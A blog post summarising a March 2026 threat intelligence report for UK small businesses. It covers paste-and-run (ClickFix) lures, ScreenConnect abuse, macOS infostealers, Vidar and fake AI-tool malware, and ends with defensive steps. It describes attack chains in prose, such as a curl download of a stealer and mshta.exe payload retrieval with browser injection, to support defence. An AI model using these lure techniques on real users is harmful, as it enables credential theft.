Red Canary's March 2026 Threat Report: What UK Small Businesses Need to Do This Week
Red Canary published their Intelligence Insights report for March 2026 on 19 March. The report covers threat activity observed across their customer base during February 2026. It is one of the more useful monthly intelligence publications available because it ranks threats by prevalence across real customer environments, not by theoretical severity.
This post takes the key findings and translates them into specific, practical steps for UK small businesses. I will start with what the data actually says, then tell you what to do about it.
The February 2026 Top Ten: What the Rankings Tell Us
The full ranked list for February 2026 is as follows:
- ScreenConnect (no change)
- Atomic Stealer (up, highest-ever rank)
- ClearFake (up)
- MacSync Stealer (up, highest-ever rank)
- Scarlet Goldfinch (up)
- Vidar (up, returned after September 2022)
- Amber Albatross (down)
- NetSupport Manager (down)
- SocGholish (up)
- JustAskJacky (up)
There is a four-way tie for second place and a two-way tie for ninth. Red Canary ranks by the number of unique customer environments in which a threat was observed, not by severity or damage caused.
The single observation that ties most of this together: all four threats tied for second place are currently delivered via paste-and-run. Red Canary state this explicitly. It is the dominant initial access technique in this month’s data, and it deserves your full attention before you read anything else.
What Paste-and-Run Means and Why It Bypasses Your Defences
Paste-and-run, also known as ClickFix or FakeCAPTCHA, is a social engineering technique where an attacker presents the victim with a fake error message or CAPTCHA on a website. The message instructs them to press a keyboard shortcut, paste a command that has been silently copied to their clipboard, and press Enter.
The command runs. It is malicious. The victim did it themselves.
This technique evades most standard defences because there is no malicious attachment to scan, no suspicious download to block, and no executable being sent by email. The malicious action happens entirely on the victim’s own machine, initiated by the victim’s own keystrokes. Standard email filtering, antivirus, and many endpoint tools do not have visibility into this execution path unless specifically configured for it.
For a small business with limited security tooling, paste-and-run is a significant gap. The only reliable defence is a combination of staff awareness and endpoint controls that restrict which commands can be executed.
ScreenConnect: Still Number One, Still Being Abused via Phishing
ScreenConnect has held the top position for at least two consecutive months. Red Canary document it being delivered via phishing emails disguised as party invitations and official documents. In some observed cases, a different remote access tool was delivered first (Datto, CentraStage, or Syncro), which then installed ScreenConnect as a second stage. One RMM tool installing another is a deliberate obfuscation technique.
If your business uses ScreenConnect or any other remote access software, the audit question is specific: does every installed instance connect to your account or your IT provider’s account? Not someone else’s. This is not a theoretical check. The STAC6405 campaign documented by Sophos last week showed exactly this technique being used at scale against over 80 organisations.
MacOS Is Not a Safe Harbour: Two Mac Infostealers in the Top Five
Both Atomic Stealer and MacSync Stealer reached their highest-ever rankings in February 2026, sitting jointly in second place. Both target macOS systems specifically, and both are delivered via paste-and-run.
Atomic Stealer is designed to steal browser-stored credentials, payment card data, macOS Keychain entries, and cryptocurrency wallet data. In February 2026, Red Canary observed it using a new numeric obfuscation scheme in its AppleScript code, likely in response to Apple publishing new XProtect detection rules the previous month. MacSync Stealer targets the same data types and was observed using a Homebrew-style pop-up as a lure, tricking users into running a curl command that downloaded and executed the stealer.
Many UK small businesses adopt Macs under the assumption that they face fewer security threats than Windows devices. The February 2026 data does not support that assumption. Two macOS-specific infostealers in the top five is not a marginal finding.
If your business has Mac devices, they require the same security controls as Windows devices: endpoint protection, application controls, and staff awareness training that covers Mac-specific lure techniques.
Vidar Returns After 3.5 Years: What the Comeback Means
Vidar is an information stealer that has been active since 2018, originally developed as a fork of the Arkei malware family. It last appeared in Red Canary’s top ten in September 2022. Its return at number six in February 2026 is directly connected to the 2025 law enforcement disruptions of LummaC2 and Rhadamanthys, two widely used information stealers. Red Canary note that the migration toward alternatives was “inevitable.”
Trend Micro reported an updated Vidar version in October 2025 with improved anti-analysis capabilities, enhanced data theft functions, and more capable browser credential extraction. The February 2026 execution chain Red Canary documented shows Vidar being delivered via a fake CAPTCHA paste-and-run lure, using mshta.exe to retrieve and execute the payload, then injecting malicious code into chrome.exe and msedge.exe to steal credentials and session tokens, before deleting itself from disk.
The practical lesson from Vidar’s return is that law enforcement action against criminal infrastructure reduces but does not eliminate threats. The criminal ecosystem is resilient and adaptive. When one stealer is disrupted, others fill the gap. Your defences need to address the technique (credential theft via stealer malware) rather than specific named variants.
JustAskJacky: Malicious Apps Disguised as AI Tools
JustAskJacky is a family of malicious NodeJS applications that present themselves as helpful AI assistants or utility tools while conducting reconnaissance and executing arbitrary commands in the background. Lure names include AllManualsReader, AskBettyHow, ManualReaderPro, and OpenMyManual.
This threat is relevant to small businesses whose staff are actively looking for free AI productivity tools. An employee searching for a quick AI assistant to help with a task, finding what looks like a useful free application, and downloading it is a plausible scenario in most businesses. The malicious intent is not visible during installation.
How to Turn This Into a Competitive Advantage
Monthly threat intelligence is available to anyone, but most small businesses do not act on it. The ones that do, and can demonstrate they do, have a concrete differentiator in procurement conversations and supplier assessments.
Document your threat awareness process. A simple monthly log showing that your business reviews authoritative threat intelligence and takes specific actions in response is evidence of a proactive security posture. It costs one hour per month. It satisfies requirements in several cyber insurance policies and supply chain questionnaires.
Use the Mac security gap as a client conversation. If you operate in a sector where clients also use Macs, being able to say that you apply consistent security controls across all device types, including macOS, is a differentiator. Most of your competitors have not thought about this.
Reference the paste-and-run threat in your staff training records. If you brief your team on this technique this month, document it. Dated training records showing your team was specifically briefed on current attack methods are useful evidence in both insurance and procurement contexts.
How to Sell This to Your Board
Three points that translate into board-level language.
The threat to credentials is the threat to the business. Every high-ranking threat in this month’s data is primarily a credential theft operation. Browser-stored passwords, session tokens, email account access. When an attacker has those, they have access to your business systems, your client data, and your financial platforms. The credential is the key; losing it is the breach.
Your Macs are in scope. If the board believes Mac devices require less security investment, the February 2026 threat data is a direct challenge to that position. Two of the top five threats specifically target macOS. Applying lower security standards to Macs is a gap that is being actively exploited.
Takedowns do not make you safe. The return of Vidar illustrates that criminal infrastructure disruptions reduce the threat temporarily, not permanently. Adversaries adapt. The investment case for ongoing security controls is not a one-time problem that gets solved; it is an ongoing operational requirement. This month’s data is the evidence.
What This Means for Your Business
-
Brief your team on paste-and-run this week. Show them what the lure looks like: a webpage saying they need to press Windows+R (or Command+Space on Mac), paste something to fix an error or complete a CAPTCHA, and press Enter. Tell them the rule is simple: if a website asks them to copy and run a command, they stop and call IT before doing anything.
-
Audit remote access software on every device. Log into each installed instance of ScreenConnect, AnyDesk, TeamViewer, LogMeIn, or any other remote access tool and confirm it connects to your account or your authorised IT provider’s account. Flag anything unrecognised as an immediate incident.
-
Apply endpoint protection to Mac devices. If your Mac devices currently run without endpoint security software, address this before anything else. Several Cyber Essentials-aligned providers support macOS. This is not optional given the current threat data.
-
Block software installs from unapproved sources. On both Windows and Mac, configure devices so that standard users cannot install software without administrator approval. This is a Cyber Essentials requirement and it stops both paste-and-run payloads and threats like JustAskJacky from completing their installation.
-
Check browser credential storage. The majority of infostealers in this month’s data specifically target credentials saved in browsers: Chrome, Edge, Safari. Review whether your business relies on browser-saved passwords and consider replacing that with a dedicated password manager, which stores credentials in an encrypted vault rather than the browser’s credential store.